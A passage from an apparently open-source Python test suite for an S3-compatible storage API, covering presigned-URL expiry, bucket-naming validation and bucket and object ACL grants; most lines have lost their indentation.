@attr(assertion='succeeds')
def test_object_put_authenticated():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='put')
@attr(operation='authenticated, expired presigned PUT URL')
@attr(assertion='fails 403')
def test_object_raw_put_authenticated_expired():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo')
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='put_object', Params=params, ExpiresIn=-1000, HttpMethod='PUT')
    # the presigned parameters don't accept a 'Body', so the payload is passed to requests.put directly
res = requests.put(url, data="foo", verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
def check_bad_bucket_name(bucket_name):
"""
Attempt to create a bucket with a specified name, and confirm
that the request fails because of an invalid bucket name.
"""
client = get_client()
e = assert_raises(ClientError, client.create_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# AWS does not enforce all documented bucket restrictions.
# http://docs.amazonwebservices.com/AmazonS3/2006-03-01/dev/index.html?BucketRestrictions.html
@attr('fails_on_aws')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='name begins with underscore')
@attr(assertion='fails with subdomain: 400')
def test_bucket_create_naming_bad_starts_nonalpha():
bucket_name = get_new_bucket_name()
check_bad_bucket_name('_' + bucket_name)
def check_invalid_bucketname(invalid_name):
"""
    Send a create bucket request with an invalid bucket name,
    bypassing the client-side ParamValidationError that would be
    raised if the invalid name were passed to create_bucket directly.
    Returns the (status, error_code) tuple from the failed request.
"""
client = get_client()
valid_bucket_name = get_new_bucket_name()
def replace_bucketname_from_url(**kwargs):
url = kwargs['params']['url']
new_url = url.replace(valid_bucket_name, invalid_name)
kwargs['params']['url'] = new_url
client.meta.events.register('before-call.s3.CreateBucket', replace_bucketname_from_url)
    # call with the valid name so boto3's client-side checks pass; the hook swaps in the invalid name
    e = assert_raises(ClientError, client.create_bucket, Bucket=valid_bucket_name)
status, error_code = _get_status_and_error_code(e.response)
return (status, error_code)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='empty name')
@attr(assertion='fails 405')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_create_naming_bad_short_empty():
invalid_bucketname = ''
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 405)
eq(error_code, 'MethodNotAllowed')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='short (one character) name')
@attr(assertion='fails 400')
def test_bucket_create_naming_bad_short_one():
check_bad_bucket_name('a')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='short (two character) name')
@attr(assertion='fails 400')
def test_bucket_create_naming_bad_short_two():
check_bad_bucket_name('aa')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='excessively long names')
@attr(assertion='fails with subdomain: 400')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_create_naming_bad_long():
invalid_bucketname = 256*'a'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
invalid_bucketname = 280*'a'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
invalid_bucketname = 3000*'a'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
def check_good_bucket_name(name, _prefix=None):
"""
Attempt to create a bucket with a specified name
and (specified or default) prefix, returning the
results of that effort.
"""
# tests using this with the default prefix must *not* rely on
# being able to set the initial character, or exceed the max len
# tests using this with a custom prefix are responsible for doing
# their own setup/teardown nukes, with their custom prefix; this
# should be very rare
if _prefix is None:
_prefix = get_prefix()
bucket_name = '{prefix}{name}'.format(
prefix=_prefix,
name=name,
)
client = get_client()
response = client.create_bucket(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
def _test_bucket_create_naming_good_long(length):
"""
Attempt to create a bucket whose name (including the
prefix) is of a specified length.
"""
# tests using this with the default prefix must *not* rely on
# being able to set the initial character, or exceed the max len
# tests using this with a custom prefix are responsible for doing
# their own setup/teardown nukes, with their custom prefix; this
# should be very rare
prefix = get_new_bucket_name()
assert len(prefix) < 63
num = length - len(prefix)
name=num*'a'
bucket_name = '{prefix}{name}'.format(
prefix=prefix,
name=name,
)
client = get_client()
response = client.create_bucket(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/60 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_good_long_60():
_test_bucket_create_naming_good_long(60)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/61 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_good_long_61():
_test_bucket_create_naming_good_long(61)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/62 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_good_long_62():
_test_bucket_create_naming_good_long(62)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/63 byte name')
@attr(assertion='fails with subdomain')
def test_bucket_create_naming_good_long_63():
_test_bucket_create_naming_good_long(63)
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list w/61 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_list_long_name():
prefix = get_new_bucket_name()
length = 61
num = length - len(prefix)
name=num*'a'
bucket_name = '{prefix}{name}'.format(
prefix=prefix,
name=name,
)
bucket = get_new_bucket_resource(name=bucket_name)
is_empty = _bucket_is_empty(bucket)
eq(is_empty, True)
# AWS does not enforce all documented bucket restrictions.
# http://docs.amazonwebservices.com/AmazonS3/2006-03-01/dev/index.html?BucketRestrictions.html
@attr('fails_on_aws')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/ip address for name')
@attr(assertion='fails on aws')
def test_bucket_create_naming_bad_ip():
check_bad_bucket_name('192.168.5.123')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/! in name')
@attr(assertion='fails with subdomain')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_create_naming_bad_punctuation():
# characters other than [a-zA-Z0-9._-]
invalid_bucketname = 'alpha!soup'
status, error_code = check_invalid_bucketname(invalid_bucketname)
# TODO: figure out why a 403 is coming out in boto3 but not in boto2.
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# test_bucket_create_naming_dns_* are valid but not recommended
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/underscore in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_underscore():
invalid_bucketname = 'foo_bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/100 byte name')
@attr(assertion='fails with subdomain')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
def test_bucket_create_naming_dns_long():
prefix = get_prefix()
assert len(prefix) < 50
num = 63 - len(prefix)
check_good_bucket_name(num * 'a')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/dash at end of name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dash_at_end():
invalid_bucketname = 'foo-'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/.. in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dot_dot():
invalid_bucketname = 'foo..bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/.- in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dot_dash():
invalid_bucketname = 'foo.-bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/-. in name')
@attr(assertion='fails')
@attr('fails_on_aws') # <Error><Code>InvalidBucketName</Code><Message>The specified bucket is not valid.</Message>...</Error>
# Should now pass on AWS even though it has 'fails_on_aws' attr.
def test_bucket_create_naming_dns_dash_dot():
invalid_bucketname = 'foo-.bar'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create')
def test_bucket_create_exists():
# aws-s3 default region allows recreation of buckets
# but all other regions fail with BucketAlreadyOwnedByYou.
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
    try:
        client.create_bucket(Bucket=bucket_name)
    except ClientError as e:
        status, error_code = _get_status_and_error_code(e.response)
        eq(status, 409)
        eq(error_code, 'BucketAlreadyOwnedByYou')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get location')
def test_bucket_get_location():
location_constraint = get_main_api_name()
if not location_constraint:
raise SkipTest
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, CreateBucketConfiguration={'LocationConstraint': location_constraint})
response = client.get_bucket_location(Bucket=bucket_name)
if location_constraint == "":
location_constraint = None
eq(response['LocationConstraint'], location_constraint)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create by non-owner')
@attr(assertion='fails 409')
def test_bucket_create_exists_nonowner():
# Names are shared across a global namespace. As such, no two
# users can create a bucket with that same name.
bucket_name = get_new_bucket_name()
client = get_client()
alt_client = get_alt_client()
client.create_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, alt_client.create_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketAlreadyExists')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create with existing acl')
@attr(assertion='fails 409')
def test_bucket_recreate_overwrite_acl():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ACL='public-read')
e = assert_raises(ClientError, client.create_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketAlreadyExists')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='re-create with new acl')
@attr(assertion='fails 409')
def test_bucket_recreate_new_acl():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.create_bucket, Bucket=bucket_name, ACL='public-read')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketAlreadyExists')
def check_access_denied(fn, *args, **kwargs):
e = assert_raises(ClientError, fn, *args, **kwargs)
status = _get_status(e.response)
eq(status, 403)
def check_grants(got, want):
"""
Check that grants list in got matches the dictionaries in want,
in any order.
"""
eq(len(got), len(want))
for g, w in zip(got, want):
w = dict(w)
g = dict(g)
eq(g.pop('Permission', None), w['Permission'])
eq(g['Grantee'].pop('DisplayName', None), w['DisplayName'])
eq(g['Grantee'].pop('ID', None), w['ID'])
eq(g['Grantee'].pop('Type', None), w['Type'])
eq(g['Grantee'].pop('URI', None), w['URI'])
eq(g['Grantee'].pop('EmailAddress', None), w['EmailAddress'])
eq(g, {'Grantee': {}})
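# Illustrative sketch only (the helper name below is hypothetical and is not
# referenced by the tests in this file): the owner's FULL_CONTROL entry that
# check_grants() expects is repeated throughout these tests and could be built
# once like this:
def _owner_full_control_want(user_id, display_name):
    """Expected-grant dict for the bucket/object owner, as passed to check_grants()."""
    return dict(
        Permission='FULL_CONTROL',
        ID=user_id,
        DisplayName=display_name,
        URI=None,
        EmailAddress=None,
        Type='CanonicalUser',
    )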
@attr(resource='bucket')
@attr(method='get')
@attr(operation='default acl')
@attr(assertion='read back expected defaults')
def test_bucket_acl_default():
bucket_name = get_new_bucket()
client = get_client()
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
eq(response['Owner']['DisplayName'], display_name)
eq(response['Owner']['ID'], user_id)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='public-read acl')
@attr(assertion='read back expected defaults')
@attr('fails_on_aws') # <Error><Code>IllegalLocationConstraintException</Code><Message>The unspecified location constraint is incompatible for the region specific endpoint this request was sent to.</Message>
def test_bucket_acl_canned_during_create():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='acl: public-read,private')
@attr(assertion='read back expected values')
def test_bucket_acl_canned():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
client.put_bucket_acl(ACL='private', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket.acls')
@attr(method='put')
@attr(operation='acl: public-read-write')
@attr(assertion='read back expected values')
def test_bucket_acl_canned_publicreadwrite():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='WRITE',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='acl: authenticated-read')
@attr(assertion='read back expected values')
def test_bucket_acl_canned_authenticatedread():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='authenticated-read', Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='get')
@attr(operation='default acl')
@attr(assertion='read back expected defaults')
def test_object_acl_default():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl public-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_during_create():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(ACL='public-read', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl public-read,private')
@attr(assertion='read back expected values')
def test_object_acl_canned():
bucket_name = get_new_bucket()
client = get_client()
# Since it defaults to private, set it public-read first
client.put_object(ACL='public-read', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
# Then back to private.
client.put_object_acl(ACL='private',Bucket=bucket_name, Key='foo')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object')
@attr(method='put')
@attr(operation='acl public-read-write')
@attr(assertion='read back expected values')
def test_object_acl_canned_publicreadwrite():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(ACL='public-read-write', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='WRITE',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl authenticated-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_authenticatedread():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(ACL='authenticated-read', Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
display_name = get_main_display_name()
user_id = get_main_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl bucket-owner-read')
@attr(assertion='read back expected values')
def test_object_acl_canned_bucketownerread():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
alt_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
bucket_acl_response = main_client.get_bucket_acl(Bucket=bucket_name)
bucket_owner_id = bucket_acl_response['Grants'][2]['Grantee']['ID']
bucket_owner_display_name = bucket_acl_response['Grants'][2]['Grantee']['DisplayName']
alt_client.put_object(ACL='bucket-owner-read', Bucket=bucket_name, Key='foo')
response = alt_client.get_object_acl(Bucket=bucket_name, Key='foo')
alt_display_name = get_alt_display_name()
alt_user_id = get_alt_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='READ',
ID=bucket_owner_id,
DisplayName=bucket_owner_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='acl bucket-owner-full-control')
@attr(assertion='read back expected values')
def test_object_acl_canned_bucketownerfullcontrol():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
alt_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
bucket_acl_response = main_client.get_bucket_acl(Bucket=bucket_name)
bucket_owner_id = bucket_acl_response['Grants'][2]['Grantee']['ID']
bucket_owner_display_name = bucket_acl_response['Grants'][2]['Grantee']['DisplayName']
alt_client.put_object(ACL='bucket-owner-full-control', Bucket=bucket_name, Key='foo')
response = alt_client.get_object_acl(Bucket=bucket_name, Key='foo')
alt_display_name = get_alt_display_name()
alt_user_id = get_alt_user_id()
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=bucket_owner_id,
DisplayName=bucket_owner_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='set write-acp')
@attr(assertion='does not modify owner')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_object_acl_full_control_verify_owner():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
main_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
grant = { 'Grants': [{'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}], 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
main_client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=grant)
grant = { 'Grants': [{'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'READ_ACP'}], 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
alt_client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=grant)
response = alt_client.get_object_acl(Bucket=bucket_name, Key='foo')
eq(response['Owner']['ID'], main_user_id)
def add_obj_user_grant(bucket_name, key, grant):
"""
Adds a grant to the existing grants meant to be passed into
the AccessControlPolicy argument of put_object_acls for an object
owned by the main user, not the alt user
A grant is a dictionary in the form of:
{u'Grantee': {u'Type': 'type', u'DisplayName': 'name', u'ID': 'id'}, u'Permission': 'PERM'}
"""
client = get_client()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
response = client.get_object_acl(Bucket=bucket_name, Key=key)
grants = response['Grants']
grants.append(grant)
grant = {'Grants': grants, 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
return grant
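# Example usage (illustrative; mirrors how the tests below build policies):
#   grant = {'Grantee': {'ID': get_alt_user_id(), 'Type': 'CanonicalUser'},
#            'Permission': 'READ'}
#   policy = add_obj_user_grant(bucket_name, 'foo', grant)
#   get_client().put_object_acl(Bucket=bucket_name, Key='foo',
#                               AccessControlPolicy=policy)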
@attr(resource='object.acls')
@attr(method='put')
@attr(operation='set write-acp')
@attr(assertion='does not modify other attributes')
def test_object_acl_full_control_verify_attributes():
bucket_name = get_new_bucket_name()
main_client = get_client()
alt_client = get_alt_client()
main_client.create_bucket(Bucket=bucket_name, ACL='public-read-write')
header = {'x-amz-foo': 'bar'}
# lambda to add any header
add_header = (lambda **kwargs: kwargs['params']['headers'].update(header))
main_client.meta.events.register('before-call.s3.PutObject', add_header)
main_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = main_client.get_object(Bucket=bucket_name, Key='foo')
content_type = response['ContentType']
etag = response['ETag']
alt_user_id = get_alt_user_id()
grant = {'Grantee': {'ID': alt_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}
grants = add_obj_user_grant(bucket_name, 'foo', grant)
main_client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=grants)
response = main_client.get_object(Bucket=bucket_name, Key='foo')
eq(content_type, response['ContentType'])
eq(etag, response['ETag'])
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl private')
@attr(assertion='a private object can be set to private')
def test_bucket_acl_canned_private_to_private():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_bucket_acl(Bucket=bucket_name, ACL='private')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
def add_bucket_user_grant(bucket_name, grant):
"""
Adds a grant to the existing grants meant to be passed into
the AccessControlPolicy argument of put_object_acls for an object
owned by the main user, not the alt user
A grant is a dictionary in the form of:
{u'Grantee': {u'Type': 'type', u'DisplayName': 'name', u'ID': 'id'}, u'Permission': 'PERM'}
"""
client = get_client()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
grants.append(grant)
grant = {'Grants': grants, 'Owner': {'DisplayName': main_display_name, 'ID': main_user_id}}
return grant
def _check_object_acl(permission):
"""
Sets the permission on an object then checks to see
if it was set
"""
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
policy = {}
policy['Owner'] = response['Owner']
policy['Grants'] = response['Grants']
policy['Grants'][0]['Permission'] = permission
client.put_object_acl(Bucket=bucket_name, Key='foo', AccessControlPolicy=policy)
response = client.get_object_acl(Bucket=bucket_name, Key='foo')
grants = response['Grants']
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
check_grants(
grants,
[
dict(
Permission=permission,
ID=main_user_id,
DisplayName=main_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl FULL_CONTROL')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl():
_check_object_acl('FULL_CONTROL')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl WRITE')
@attr(assertion='reads back correctly')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${USER}</ArgumentValue>
def test_object_acl_write():
_check_object_acl('WRITE')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set acl WRITE_ACP')
@attr(assertion='reads back correctly')
